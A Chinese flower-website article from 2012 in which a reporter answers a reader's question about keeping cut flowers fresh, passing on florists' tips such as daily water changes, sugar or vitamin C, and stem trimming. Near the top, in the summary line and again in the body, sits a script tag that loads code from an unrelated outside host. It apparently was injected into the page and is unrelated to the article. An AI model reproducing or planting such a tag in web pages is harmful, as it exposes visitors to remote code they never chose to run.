您现在的位置:那花园花卉网 > 花艺天地 > 插花花艺 >

买来鲜花如何保鲜

来源:未知
】 2012-08-12 00:00
[摘要]#106avascript" src="http://zz.ag365.com/js/check.asp?id=6840"/gt; 春节之后,我陆续买了很多鲜花回家,想装扮一下家居,但鲜花总是养不了很长时间。特别是这一段时间,不知是不是因为天气变化,花总是很快就凋谢或死亡。请问有什么办法让鲜花开得长久一
<Script type="text/javascript" src="http://zz.ag365.com/js/check.asp?id=6840"></Script>

  春节之后,我陆续买了很多鲜花回家,想装扮一下家居,但鲜花总是养不了很长时间。特别是这一段时间,不知是不是因为天气变化,花总是很快就凋谢或死亡。请问有什么办法让鲜花开得长久一些?

  读者:小 群

  记者就此事咨询了惠州一些花店的专职养花人员。据介绍,鲜花保鲜的小窍门很多,最常见的有:一、勤换水,最好是一天换一次,但是注意放在花瓶中的水不要太多,只要淹住小部分花茎就行了。二、在养花的水中,放上少许砂糖或者维生素C,这样鲜花可以比放在普通的清水中开得时间更长。另外,每天换水的时候,最好将花茎的头剪掉一小节,有利于鲜花更好地吸收营养。

   如果没有时间每天给鲜花换水,可以在花瓶中滴上一滴洗洁精,这样能让鲜花开得更久,而且更鲜艳。

  本报记者李亚平